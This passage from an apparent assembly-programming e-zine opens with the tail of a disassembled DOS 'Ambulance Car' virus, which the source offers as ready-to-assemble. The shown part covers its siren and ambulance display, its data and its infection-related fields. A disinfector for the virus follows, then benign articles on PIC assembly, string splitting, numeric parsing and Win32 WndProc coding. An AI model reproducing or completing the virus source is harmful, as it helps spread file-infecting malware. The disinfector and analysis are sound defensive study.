; Send MSB (Most Significant Byte) retn play_siren endp ; Show the 'ambulance car' ;------------------------- show_ambulance proc near push cx push dx lea bx, [si+ambulance_data-4] add bx, dx ; Setup which ambulance_data column ; were going to print add dx, bp ; Don't show the ambulance_data columns or dx, dx ; which aren't still visible js ambulance_done cmp dx, 50h ; Check if the column we're printing is jae ambulance_done ; past the screen limit ; If yes, then the don't print it mov di, 3200 ; Point to beginning of screen's 64th ; line add di, dx ; Point to the column we're supposed to add di, dx ; be printing at sub dx, bp ; Restore to initial column value mov cx, 5 ; Set it up so we're in the first line decode_character: mov ah, 7 ; Set color attribute to white ; Decode the character ; ; It's really pretty ingenius, each character is encoded in a way, so that for ; each line beyond the first one that character is incremented by one and for ; each column beyond the first the same thing happens. So taken that into ; account it's not difficult to understand how it all works and how to decode ; the ambulance_data mov al, [bx] ; Get the character sub al, 7 add al, cl ; Account for which line we're in sub al, dl ; Account for which column we're in cmp cx, 5 ; Are we in the first line? jne print_character ; If we are, then... mov ah, 15 ; Set color attribute to high-intensity ; white test bp, 00000011b ; Is this the ending tone of a AAAA or ; BBBB tune sequence? jz print_character ; If not, then go ahead and print the ; 'siren' characters mov al, ' ' ; Else, replace them with a ' ' (to ; accomplish the visual 'siren' effect print_character: stosw ; Print the character to screen add bx, 16 ; Point to next ambulance_data line add di, 158 ; Point to next screen line loop decode_character ambulance_done: pop dx pop cx retn show_ambulance endp ; Wait for one tick (18.2 per second) to pass ;-------------------------------------------- wait_tick proc near push ds mov ax, BDA_addr mov ds, ax mov ax, ds:BDA_timer_counter ; Get ticks since midnight check_timer: cmp ax, ds:BDA_timer_counter ; Check if one tick has je check_timer ; already passed pop ds retn wait_tick endp ;--- Data from here below ambulance_data: first_line db 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh db 2Dh, 2Eh, 2Fh, 30h, 31h second_line db 23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h db 0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h third_line db 24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h db 0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h fourth_line db 25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h db 0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh fifth_line db 26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh db 0EFh, 0F0h, 32h, 62h, 34h, 0F4h ; Here's how the ambulance looks - see under DOS (box): ; ; \|/ ; ÜÜÜÜÜÜÜÜÛÜÜÜ ; ÛÛÛÛß ßÛÛÛ \ ; ÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛ ; ßß OO ßßßßß O ß counter dw 9 jump_code: near_jump db 0E9h relative_offset db 36h, 00h first_3bytes db 3 dup (?) file_handle dw ? virus_body: original_3bytes db 0CDh, 20h ; 'int 20h' opcode db 90h ; 'nop' opcode ;--- Stuff that gets saved along with the virus ends here six_bytes db 6 dup (?) filename_ptr dw ? DTA_seg dw ? DTA_off dw ? file_mask: filename: pathname db 6 dup (?) db 7 dup (?) db 67 dup (?) new_DTA: reserv db 21 dup (?) f_attr db ? f_time dw ? f_date dw ? f_size dd ? f_name db 13 dup (?) filler db 85 dup (?) _TEXT ends end ambulance_car ---------------------------------------------------------------------------8<-- Special Thanks -------------- I would like to thank Cicatrix for sending me his collection of 'Ambulance Car' strains, so that I would have more than two variants to study and compare. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE 'Ambulance Car' Disinfector by Chili Since I provided a ready-to-be-assembled virus in the "'Ambulance Car' Disassembly" article, I decided to also write a bonus article with a basic disinfector for it. Please note that this disinfector doesn't locate and clean all existing 'Ambulance Car' strains, though it does work on more than half of the strains I have (thanks Cicatrix). It is only intended to work with the strain I provided, so no assurances are given as to whether it will do the job or not with other strains (it also works with the 'RedXAny' strain look-alike and with the tamed version that only displays the payload - this tamed version really isn't a virus since it doesn't replicate and so F-PROT won't report it; the disinfector does report and clean it though). An infected file can easily be cleaned by hand, so you should try that first. The disinfector will scan all .COM files in the current directory for three things: 1. the '0E9h' near jump code (other strains may have the '0EBh' jump code - this won't detect them!); 2. the delta offset calculation routine pointed to by the near jump; 3. the ambulance data at the end of the virus (if you change this into something else the disinfector will report this file as suspicious). Upon a suspicious or infected file report the user will be given a chance to clean it or continue on to the next file. And here is the disinfector: [NOTE: F-PROT will report this as a new or modified variant of SillyC - go figure!] --8<--------------------------------------------------------------------------- ; 'Ambulance Car' Disinfector ; KILLREDX by Chili for APJ #6 ; Assemble with (TASM 4.1): ; tasm /ml /m2 killredx.asm ; tlink /t killredx.obj LF equ 0Ah ; 'Line Feed' ASCII code CR equ 0Dh ; 'Carriage Return' ASCII code _TEXT segment word public 'code' assume cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT org 100h killredx proc far ;--- Print program identification message lea si, killredx_msg call print_ASCIIZ ;--- Find first .COM file lea dx, com_mask xor cx, cx mov ah, 4Eh int 21h jnc open_file jmp exit open_file: ;--- Print found file's name lea si, newline_msg call print_ASCIIZ mov si, 9Eh call print_ASCIIZ ;--- Open found file mov dx, 9Eh mov ax, 3D02h int 21h jnc read_jump ;--- Print open error message lea si, open_msg call print_ASCIIZ jmp find_next read_jump: ;--- Read jump code xchg ax, bx mov cx, 3 lea dx, jump_code mov ah, 3Fh int 21h jc read_error cmp ax, cx je check_jump jmp close_file check_jump: ;--- Compare with known virus' jump code cmp byte ptr [jump_code], 0E9h je read_displacement jmp close_file read_displacement: ;--- Move file pointer to jump offset mov dx, word ptr [jump_code+1] add dx, 3 xor cx, cx mov ax, 4200h int 21h ;--- Read displacement calculation code mov cx, 7 lea dx, displace_code mov ah, 3Fh int 21h jc read_error cmp ax, cx je check_displacement jmp close_file check_displacement: ;--- Compare with known virus' displacement calculation code cmp word ptr [displace_code], 01E8h jne exit_check cmp word ptr [displace_code+2], 0100h jne exit_check cmp word ptr [displace_code+4], 815Eh jne exit_check cmp byte ptr [displace_code+6], 0EEh jne exit_check jmp read_data exit_check: jmp close_file read_data: ;--- Move file pointer to supposed data location mov cx, 0FFFFh mov dx, 0FFF1h mov ax, 4202h int 21h ;--- Read ambulance data mov cx, 2 lea dx, ambulance_data mov ah, 3Fh int 21h jc read_error cmp ax, cx je check_data jmp close_file read_error: ;--- Print read error message lea si, read_msg call print_ASCIIZ jmp close_file check_data: ;--- Compare with know virus' ambulance data cmp word ptr [ambulance_data], 0F434h jne suspicious ;--- Print file infected or suspicious message lea si, infected_msg jmp askto_clean suspicious: lea si, suspicious_msg askto_clean: ;--- Print and read answer to whether clean file or not call print_ASCIIZ mov ah, 08h int 21h cmp al, 'y' je clean_file cmp al, 'Y' je clean_file jmp close_file clean_file: ;--- Move file pointer to supposed original bytes location mov cx, 0FFFFh mov dx, 0FFFDh mov ax, 4202h int 21h ;--- Read host's original (first 3) bytes mov cx, 3 lea dx, original_bytes mov ah, 3Fh int 21h jc read_error cmp ax, cx je write_original jmp close_file write_original: ;--- Move file pointer to beginning of file xor cx, cx xor dx, dx mov ax, 4200h int 21h ;--- Write original bytes mov cx, 3 lea dx, original_bytes mov ah, 40h int 21h jc write_error cmp ax, cx je truncate_file write_error: ;--- Print write error message lea si, write_msg call print_ASCIIZ jmp close_file truncate_file: ;--- Move file pointer to virus' jump offset (real virus start) mov dx, word ptr [jump_code+1] add dx, 3 xor cx, cx mov ax, 4200h int 21h ;--- Truncate file mov cx, 0 mov ah, 40h int 21h jc write_error cmp ax, cx jne write_error lea si, disinfected_msg call print_ASCIIZ close_file: ;--- Close file mov ah, 3Eh int 21h find_next: ;--- Find next matching file mov ah, 4Fh int 21h jc exit jmp open_file exit: ;--- Exit to DOS lea si, newline_msg call print_ASCIIZ retn killredx endp print_ASCIIZ proc near ;--- Print an ASCIIZ string lodsb cmp al, 0 je end_ASCIIZ xchg al, dl mov ah, 02h int 21h jmp print_ASCIIZ end_ASCIIZ: retn print_ASCIIZ endp killredx_msg db "'Ambulance Car' Disinfector", LF, CR db "KILLREDX by Chili for APJ #6", LF, CR, 0 newline_msg db LF, CR, 0 infected_msg db " Infected. Clean [y/n]?", 0 suspicious_msg db " Suspicious. Attempt to cleanû (û WARNING: file may " db "be corrupted if infected by an unknown/unsupported " db "strain of Ambulance Car) [y/n]?", 0 disinfected_msg db LF, CR, " Disinfected.", 0 open_msg db LF, CR, " [ERROR: opening file]", 0 read_msg db LF, CR, " [ERROR: reading from file]", 0 write_msg db LF, CR, " [ERROR: writing to file]", 0 com_mask db "*.COM", 0 jump_code db 3 dup (?) displace_code db 7 dup (?) ambulance_data dw ? original_bytes db 3 dup (?) _TEXT ends end killredx ---------------------------------------------------------------------------8<-- ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Assembling for PIC's Jan Verhoeven Below is a piece of assembly language for the MicroChip PIC processor. This particular program will flash some LED's and activate some relays based on the status of some control-inputs. The target MCU was the PIC 16C54, one of the most simple chips in that range. To give some indication of what we're upto: RAM 25 bytes ROM 512 words (of 12 bits each) I/O 12 bits Clockspeed 8 kHz (this project, max = 4 MHz) Instructions 33 On-Chip-Stack 2 levels Compare this to a modern PC clone.... RISC and Harvard architecture. ------------------------------ The PIC line of MCU's are RISC chips, so they use the Harvard architecture, and one of the results is that they have different code- and data-memories. Higher PIC's have more features, like INTerrupt sources on 4 or more pins, internal interrupts etcetera. All models have a watchdogtimer (WDT) which needs to be reset regularly (if enabled) else the MCU will reset itself. The PIC registers. ------------------ The register architecture of the PIC is somewhat odd to Intel programmer's but programming resembles that of the Hewlett Packard HP 11 range of calculators. Here is an overview of the registerset. Microchip refers to this as the "register file". file address name comment ------------ -------------- -------------------- 00 indirect calls not a real register! 01 RTCC timer counter 02 PC (or IP) lower 8 bits of it 03 STATUS flags register 04 FSR bank select of PIC 16C57 05 Port A has 4 I/O lines 06 Port B has 8 I/O lines 07 Port C 8 I/O, only 16C55 and 16C57 GP register on 'C54 and 'C56 08 GP register General purpose register .. .. .. 1F GP register General purpose register Besides these "transparant registers" there are also some hidden registers (which also are write only...) for processor control. These are: TRISA The "tristate A/B/C" registers determine the status TRISB of each pin of the I/O ports. TRISC A "1" makes it "input" and a "0" makes it an output. OPTION is for controlling the WDT and the RTCC And there's the ubiquitous "W" register. This is the "Working register" and is used to haul data back and forth. PIC registers (or "files") cannot process constants (or "literals"). This can only be done with the W-file. It takes some getting used to, but the concept is simple and straightforward and eventually you will get used to it and learn to appreciate it. From that moment on, you will only have to get used to the fact that data is nbot always ending up where you would like to have it. All instructions between W and F (any register or file) end with a "d" option. If "d" is a "1", the destination is the file F, if "d" is "0", the result will be stored in the W file... This took me some time to get used to and still is the main source of errors. Apart from having selected the wrong osciallator and not disabling the WDT.... The PIC instructions. --------------------- The instructions for the PIC 16C54 are as follows: mnemonic description ---------------- ----------------------------------------- ADDWF F, d d := W + F ANDLW k W := W AND k ANDWF F, d d := W AND F BCF F, b bit b in F is cleared (i.e. made zero) BSF F, b bit b in F is set (i.e. made one) BTFSC F, b if bit b in F is CLEAR, skip next instruction BTFSS F, b if bit b in F is SET, skip next instruction CALL k push PC, PC := k CLRF F Clear file F CLRW Clear file W CLRWDT Clear Watchdogtimer COMF F F := NOT F (1's complement) DECF F, d d := F - 1 DECFSZ F, d d := F - 1; If 0 => skip next instruction GOTO k PC = k INCF F, d d := F + 1 INCFSZ F, d d := F + 1; If 0 => skip next instruction IORLW k W := W OR k IORWF F, d d := W OR F MOVF F, d d := F (zero flag affected) MOVLW k W := k MOVWF F F := W NOP No operation OPTION OPTION := W RETLW k W := k, pop PC RLF F, d d := rotate left through carry (F) RRF F, d d := rotate right through carry (F) SLEEP enter powerdown mode SUBWF F, d d := F - W (2's complement) SWAPF F, d d := swap-nibbles (F) TRIS F TRIState information for I/O pins XORLW k W := W XOR k XORWF F, d d := W XOR F Especially the "F, d" construct takes some getting used to. Below is the source for the "LEGO controller": -------------------------------------------------------------------------- title "LEGO 003" subtitl "control LEGO technic devices" LIST P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80 PIC54 equ 1FFH ; Define Reset Vectors RTCC equ 1h ; define register designators PC equ 2h ; the program counter is a register as well STATUS equ 3h ; F3 Reg is STATUS Reg. PORT_A equ 5h PORT_B equ 6h ; I/O Port Assignments RTCC_tc equ 0Dh ; time constant for RTCC count_1 equ 0Eh ; delay counters and GP registers count_2 equ 0Fh file equ 1 w equ 0 flag_0 equ 0 ; input bits in RA port flag_1 equ 1 flag_2 equ 2 flag_3 equ 3 LED_0 equ 0 ; status led 1, in RB Port LED_1 equ 1 ; status led 2 RL_1 equ 2 ; relays 1 - 3 RL_2 equ 3 RL_3 equ 4 s_clk equ 5 ; s_clk input s_data equ 6 ; s_data input go equ 7 delay movlw .100 ; mov W with 100 decimal movwf count_1 ; xfer W to register dela_1 clrf count_2 ; count_2 = 0 dela_2 decfsz count_2, file ; count_2 = count_2 - 1 goto dela_2 ; skip this instruction if count_2 = 0, ... decfsz count_1, file ; ... ending here: count_1 = count_1 - 1 goto dela_1 ; skip this instruction when count_1 = 0 retlw 0 ; ending here, if so. flash bcf PORT_B, LED_1 ; flash LED's 0 and 1 as an acknowledgement bsf PORT_B, LED_0 ; activate the LED's. call delay ; wait a while bcf PORT_B, LED_0 ; toggle the LED's bsf PORT_B, LED_1 call delay ; wait a second! bcf PORT_B, LED_1 ; turn LED_1 off as well. retlw 0 ; return to caller with W = 0 RT_chk clrwdt ; clear the watchdog timer btfsc RTCC, 7 ; RELAY_3 follows bit7 of RTCC bcf PORT_B, RL_3 btfss RTCC, 7 bsf PORT_B, RL_3 movf RTCC, w skpz ; internal macro for BTFSS STATUS, 2 retlw 0 movf RTCC_tc, w ; if movwf RTCC retlw 0 start clrf RTCC clrf RTCC_tc ; clear RTCC and RTCC time constant movlw B'00001111' tris PORT_A ; define port A as inputs movlw B'11100000' tris PORT_B ; define port B as I/O movlw B'00110111' option ; define state of WDT, RTCC and prescaler movlw B'00011100' movwf PORT_B ; initialize port B call flash ; signal READY call flash btfss PORT_B, s_clk ; if s_clkline low, check for mode 2 request goto m_chk repeat clrwdt ; clear watchdog timer call flash movf PORT_A, w ; read port A into W andlw 3 ; mask off sensor inputs skpnz ; skip next instruction if NonZero goto set_tc ; flag_0 and _1 zero => define RTCC time constant btfsc PORT_A, flag_0 goto t_left btfsc PORT_A, flag_1 goto t_right movf PORT_B, w andlw s_clk + s_data + go skpnz ; if no RESET condition, skip goto start call RT_chk goto repeat t_left btfsc PORT_A, flag_2 ; if in end position, do not turn at all goto l_exit bcf PORT_B, RL_1 ; else set direction for Turn Left bsf PORT_B, RL_2 bsf PORT_B, LED_0 ; show direction with LED's bcf PORT_B, LED_1 chk_fl2 btfsc PORT_A, flag_2 ; wait until home-position is reached goto l_exit ; if so, get out call RT_chk ; if not, check again goto chk_fl2 ; until done l_exit bsf PORT_B, RL_1 ; release relay 1 bcf PORT_B, LED_0 ; extinguish light 0 goto repeat ; jump back t_right btfsc PORT_A, flag_3 ; if in end position, do not turn at all goto r_exit bcf PORT_B, RL_2 ; else set direction for Turn Right bsf PORT_B, RL_1 bsf PORT_B, LED_1 ; show direction with LED's bcf PORT_B, LED_0 chk_fl3 btfsc PORT_A, flag_3 ; wait until home position reached goto r_exit call RT_chk goto chk_fl3 r_exit bsf PORT_B, RL_2 ; deactivate lights and relays bcf PORT_B, LED_1 goto repeat m_chk clrf count_1 ; check inputs and make sure there's no glitch clrf count_2 m_chk_1 btfss PORT_B, s_clk decf count_1, file ; count pulses s_clkline = low decfsz count_2, file goto m_chk_1 movf count_1, w ; w = low-pulses subwf count_2, w ; if count_1 <> count_2, glitch occurred skpz goto start set_tc movf RTCC, w ; move current value of RTCC movwf RTCC_tc ; to time constant register goto repeat org PIC54 ; goto highest word in code space goto start ; and place the reset vector. end -------------------------------------------------------------------------- If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional jumps may ring a bell. I don't know how the HP machines handle these jumps, but the PIC line does the following: condition action by PIC --------- ----------------------------------- FALSE execute next instruction TRUE replace next instruction with a NOP This enables the programmer to make 100% accurate timingloops since there is no difference between a FALSE and a TRUE condition. The size of this piece of code is easy to calculate: each line with an mnemonic is one instructionword. This makes 115 words from the 512 word program memoryspace, so we have nearly 400 instructionwords wasted. The PIC's are marvelous chips to bridge the gap between lots and lots of TTL chips and the overkill of a microcontroller unit with separate RAM, ROM and I/O. If you want to find out more of this kind of CPU's, visit the website at http://www.microchip.com for PDF datasheets and more. Scenix also has a range of clones out, right now. They are software compatible but offer more hardware features. Which is not difficult since the codeword in the design of the PIC's seemed to have been KISS. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Splitting Strings by mammon_ Those familiar with Perl will undoubtedly have used its split() function, which takes a single string and splits it into multiple strings or into an array, based on a delimiter character specified in the call. Typical invocations of split() would be: ($field1, $field2, $junk) = split(':', $line); @array = split(' ', $line); In the first line, the source string is split into a maximum of 3 substrings, creating a new string each time it encounters a colon character; note that the third string, $junk, contains the entire rest of the string -- only the first 2 colons will be parsed. In the second line, an array of strings is created by splitting the source string at the space character; since the number of destin- ation strings is not specified, the array will contain one element for each substring [read: each string created by splitting the original at a whitespace character]. Strings and string parsing are notably tedious in assembly. Once learning Perl, I found that the pseudocode for many of my asm programs started to include a few calls to 'split', since it is a handy one-line method of string parsing, applicable to processing command lines, user input, and data files. As a result, it quickly became necessary to write such a routine. Being that asm has no inherent array or string tokenizing support, there are many possible approaches to string splitting. Since the most immediate problem is that the split() routine does not know in advance how many substrings it will be creating, there is a temptation to code a strtok() replacement, such that the first call returns the first substring, and subsequent calls each return the next substring until the end of the string has been reached: mov ecx, ptrArray push dword ptrString push dword [delimiter] call split mov [ecx], eax .loop: call split cmp eax, 0 je .end mov [ecx], eax add ecx, 4 jmp .loop .end: This allows for control over the number of substrings created by only calling split() the desired number of times; however this method also requires a lot of caller-side work --setting up an array, moving the string pointer returned in eax to an appropriate array position, and keeping track of the number of array elements. It is also noticeably more clumsy than the Perl version. Another method would be to mimic the Perl function entirely, and have split() return an array of substrings: push dword ptrString push dword [delimiter] call split mov [ptrStringArray], eax This is obviously more elegant on the caller side, but it has a few subtle problems: first, the control over how many elements is split is lost; secondly, the array is of indefinite element size [i.e., one would have to scan each string again in order to find the end and thus the next string]; and lastly, the duplication of the string in memory is somewhat of a waste. The C language has more or less created a string standard in which strings are terminated with a null ['\0' or 0x0] character. Most library or OS functions to which the split strings will be passed tend to expect this termination; thus each substring is going to have a termination byte added. However, this termin- ation byte can replace the delimiter for each substring, thus allowing the original string itself to serve as the array of substrings after the split function. Thus, all that is required from the split function is to return an array of dword pointers into the original string, and a count of the array elements [substrings]: push dword ptrString push dword [delimiter] call split mov [ptrStringArray], eax mov [StringArrayNum], ebx The split function will have to create a DWORD element for each substring it splits; while this is somewhat wasteful, it is still less expensive than copying the entire string a second time, unless the string is composed of 1-3 byte substrings. In order to control the number of splits, a 'max_split' parameter will have to be added to the split() routine, such that if max_split is NULL, the split() routine will return the maximum possible number of substrings; if max_split is non-NULL, split() will return max_split or fewer substrings. The complete split routine is as follows: #--------------------------------------------------------------------split.asm ; split( char, string, max_split) ; Returns address of array of pointers into original string in eax ; Returns number of array elements in ebx ; Behavior: ; split( ":", "this:that:theother:null\0", NULL) ; "this\0that\0theother\0null\0" ; ptrArray[0] = [ptrArray+0] = "this\0" ; ptrArray[1] = [ptrArray+4] = "that\0" ; ptrArray[2] = [ptrArray+8] = "theother\0" ; ptrArray[3] = [ptrArray+C] = "null\0" EXTERN malloc EXTERN free split: push ebp mov ebp, esp ;save stack pointer mov ecx, [ebp + 8] ;max# of splits mov edi, [ebp + 12] ;pointer to target string mov ebx, [ebp + 16] ;splitchar xor eax, eax ;zero out eax for later mov edx, esp ;save current stack pos. push dword edi ;save ptr to first substring cmp ecx, 0 ;is #splits NULL? jnz do_split ;--no, start splitting mov ecx, 0xFFFF ;--yes, set to MAX do_split: mov bh, byte [edi] ;get byte from target string cmp bl, bh ;equal to delimiter? je .splitstr ;--yes, then split it cmp al, bh ;end of string? [al == 0x0] je EOS ;--yes, then leave split() inc edi ;next char loop do_split .splitstr: mov [edi], byte al ;replace split delimiter with "\0" inc edi ;move to first char after delimiter push edi ;save ptr to next substring loop do_split ;loop #splits or till EOS EOS: mov ecx, edx ;edx, ecx == original stack position sub ecx, esp ;get total size of pushed pointers push ecx ;save size call malloc ;allocate that much space for array test eax, eax jz .error pop ecx ;restore size mov edi, eax ;set destination to beginning of array add edi, ecx ;move to end of array shr ecx, 2 ;divide total size/4 [= # of dwords to move] mov ebx, ecx ;save count .store: sub edi, 4 ;move to beginning of dword pop dword [edi] ;pop from stack to array loop .store .error: mov esp, ebp pop ebp ret ;eax = array[0], ebx = array count #------------------------------------------------------------------------EOF The use of the stack in this routine may be a little unclear. Each time a delimiter is encountered, the a pointer to the character after the delimiter is pushed onto the stack: this:that:theother\0 ^----------------------This is pushed at the very beginning. Element#: array[0] this:that:theother\0 ^-----------------This is pushed when the first ':' is found. Element#: array[1] this\0that:theother\0 ^-----------This is pushed when the second ':' is found Element#: array[2] this\0that\0theother\0 The stack now looks like this: --------------[ebp] ptr->string1 ptr->string2 ptr->string3 --------------[esp] The string pointers are then POPed into the array, starting with array[2] and ending with array[0]. Once the string is parsed and the pointers are PUSHed to the stack, edi is set to the address of the array [mov edi, eax] and advanced to the end of the allocated array [add edi, ecx]. The counter is then set to the number of DWORD pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD pointer, edi is withdrawn 4 bytes more from the end of the array [sub edi, 4] and the pointer is POPed into that 4 byte space. In the last iteration of the loop, edi is set to the beginning of the allocated array, and the first DWORD pointer [ array[0] ] is POPed into the first array element. To test this, of course, one needs a program to drive it. The following code simulates an /etc/passwd read, splitting a hard-coded line into its component, colon-delimited fields: #----------------------------------------------------------------splittest.asm BITS 32 GLOBAL main EXTERN printf EXTERN free EXTERN exit %include 'split.asm' SECTION .text main: push dword szString ;print the original string push dword szOutput call printf add esp, 8 push dword ":" ;split the original string push dword szString push dword 0 call split add esp, 12 mov ecx, ebx mov ebx, eax printarray: ;print the substrings push ecx ;printf hoses ecx!!!!! push dword [ds:ebx] push dword szOutput call printf add esp, 8 add ebx, 4 ;skip to next array element pop ecx loop printarray push dword [ptrarray] ;free the array created by split call free add esp, 4 push dword 0 ;program is done call exit SECTION .data szOutput db '%s',0Ah,0Dh,0 ;printf format string szString db 'name:password:UID:GID:group:home',0 ;string to print #------------------------------------------------------------------------EOF This program was written using nasm on a glibc Linux platform; however the split routine itself is fairly portable --the only assumed external routine is malloc() and -- and can easily be rewritten for the DOS or win32 platforms. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE String to Numeric Conversion by Laura Fairhead Here I present you with a library routine that scans a value from a string and converts it to an integer. It is very useful, not only when you have to convert string->value but also if you are parsing and want to recognise a numeric token. The routine will scan values in any radix from 0 to 36. Characters for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z". With this routine there are 2 API's 'scanur' and 'scanu'. 'scanur' is used to set the radix of the scan conversion. Once this value is set the main routine 'scanu' can be called freely to scan values from the string. The scan routine is called with a string pointer which is updated on exit to the first invalid character. It will return with the carry flag set if the value was too big to fit into the return register EAX. If the carry flag is clear, there is no error, however now the zero flag indicates if a valid value was actually scanned. This return status convention gives the most flexibility to the application programmer, also if a valid value MUST be scanned they can detect the condition via:- CALL NEAR PTR scanu JNA error ;get out if overflow/no value The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be scanned errors may be picked up with only one test. =========START OF CODE===================================================== ; ;(current scan radix) ; scanuradi: DB ? ; ;scanur- set up for scanu routine ; ;entry: AL=radix ; ; !! radix must be in range 0<=radix<=36 ; ; !! radix must be set by calling this routine prior to ; !! using scanu ; ;exit: (all registers preserved) ; scanur PROC NEAR MOV BYTE PTR CS:[scanuradi],AL RET scanur ENDP ; ;scanu- scan string value returning result ; ;entry: DS:SI=address of string ; DF=0 ; ; !! radix must be set previously by calling 'scanur' ; ;exit: SI=updated to offset of first invalid character ; ; CF=1 ; a numeric overflow has occurred, ie: the number being scanned ; has become too big to fit into EAX ; ; CF=0 ; if ZF=0 then a valid value was scanned, if ZF=1 then no ; valid digits were scanned ; ; EAX=converted value ; scanu PROC NEAR ; ;preserve registers ; PUSH EDX PUSH EBX PUSH ECX PUSH DI ; ;initialise ; EBX=radix constant ; EAX=total ; ECX=0, bits8-24 of ECX always=0 to pad byte digit to dword ; DI=holds original offset ; XOR EAX,EAX XOR EBX,EBX XOR ECX,ECX MOV DI,SI MOV BL,BYTE PTR CS:[scanuradi] ; ;main loop start ; EAX,ECX change roles so that we can use AL for the digit calculation ; saving code length ; lop: XCHG EAX,ECX LODSB ; ;if "0"-"9" map to 0-9 and skip to radix check ; SUB AL,030h CMP AL,0Ah JC SHORT ko ADD AL,030h ; ;map "A"-"Z"-/"a"-"z"- to 10-35- aborting on the one invalid value (040h) ;that won't get trapped in the next stage ; AND AL,0DFh SUB AL,037h CMP AL,0Ah JC SHORT ko2 ; ;digit value checked that it is valid for the current radix ;this also weeds out previous invalid values (since they would be >35) ;jump out of loop is delayed so that EAX can be restored for exit ; ko: CMP AL,BL CMC ko2: XCHG EAX,ECX JC SHORT erriv ; ;accumalate the digit to the total. the total must be pre-multiplied. ;checks for overflow are done at both points so the routine can never ;generate false results ; MUL EBX JC errovr ADD EAX,ECX JNC lop ; ;overflow error ; adjust SI index to current char and exit, note ; that CF =1 already ; errovr: DEC SI JMP SHORT don ; ;invalid character ; main exit point, SI is adjusted to the current char ; the CMP ensures that CF =0, and also that ZF =1 iff ; no chars have been read ; erriv: DEC SI CMP SI,DI ; ;(restore registers and exit) ; don: POP DI POP ECX POP EBX POP EDX RET scanu ENDP =========END OF CODE======================================================= ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING WndProc, The Dirty Way by X-Calibre of Diamond I assume you all know what a WndProc is, and what you need it for. Let me give you a quick example of a WndProc: WndProc PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM .IF uMsg == WM_DESTROY INVOKE PostQuitMessage, NULL .ELSE INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam ret .ENDIF xor eax, eax ret WndProc ENDP This generates the following code: push ebp ; Create stack frame mov ebp, esp ; Why does MASM use 'leave', ; but not 'enter'? cmp dword ptr [ebp+0C], WM_DESTROY ; ebp+0C is uMsg jne @@notDestroy push NULL Call PostQuitMessage jmp @@exitFromDestroy @@notDestroy: push [ebp+14] ; ebp+14 is lParam push [ebp+10] ; epb+10 is wParam push [ebp+0C] ; ebp+0C is uMsg push [ebp+08] ; ebp+08 is hWnd Call DefWindowProcA ; Let Windows handle the other ; messages leave ; Remove stack frame ret 0010 ; Remove function arguments ; from stack and return @@exitFromDestroy: xor eax, eax ; Return 'FALSE' leave ; Remove stack frame ret 0010 ; Remove function arguments ; from stack and return Looks nice, and works fine... But, it builds a stack frame, even though we are not using local variables. And if you code in a good fashion, there almost never will be ...after all, this procedure is just a messagehandler, and to keep your code tidy, you will not put all the code in here, but in separate procedures, which you will call from here. There's only one reason why MASM builds a stack frame for a function: The function has a prototype for a hll call. A hll call uses the stack to transfer its arguments. So, all we have to do, is remove the prototype. That's easy: Just don't tell MASM that this function uses any arguments. This simple tweak will do the trick: WndProc PROC ... WndProc ENDP The arguments will still be passed to the function, since that part of the code is in the Windows kernel, and has not changed. Be careful though: Since MASM does not know that there are arguments on the stack, it no longer cleans up the stack. You have to specify that yourself. Now we have a slight problem: How can we access the arguments now? The answer is surprisingly easy: We create aliases for the addresses relative to the stack pointer (esp). MASM does the same, except that it uses the base pointer since it created a stack frame, and saved the original stack pointer in ebp. Knowing that Windows hll calls always push the arguments in reverse order, and that the return address is stored on the stack aswell, we can devise these indices for our parameters: hWnd EQU dword ptr [esp][4] uMsg EQU dword ptr [esp][8] wParam EQU dword ptr [esp][12] lParam EQU dword ptr [esp][16] There, now we can refer to the arguments as usual. There's 1 drawback however: Since the indices are relative to esp, they are only valid when esp is not touched. In other words: Don't try to push or pop anything and then use these arguments again. They can be used if you push some variables, then pop them again before you access any of these arguments again, because the stack pointer will be at the correct position again. Let's say you need to use the stack again (eg. for an INVOKE), so the indices will be invalidated. You might think that the only option then is to save the stack pointer again, so we're back to the stack frame... It's an option, but not the best one. Namely, ebp is a non-volatile register, and needs to be saved and restored after use. But, there are more registers in the CPU, and most of them are volatile. How about using esi for example? WndProc PROC mov esi, esp hWnd EQU dword ptr [esi][4] uMsg EQU dword ptr [esi][8] wParam EQU dword ptr [esi][12] lParam EQU dword ptr [esi][16] ... WndProc ENDP And if you leave the stack as you found it (which should always be the case with decent code), you don't even need to restore esp again. If you got dirty and the stack still contains variables you don't want anymore, then this is enough for a clean exit: WndProc PROC ... mov esp, esi ret 4 * sizeof dword ; As I mentioned earlier, we have to clean ; the stack ourselves. ; We had 4 dword arguments, so this does ; the trick WndProc ENDP Still less code, and thus faster than the original. And just as rigid. You have one register less to use during the WndProc, but as I said earlier, there shouldn't be too much code here, so should be able to spare the register. Well, there's just 1 more thing that can be done with this 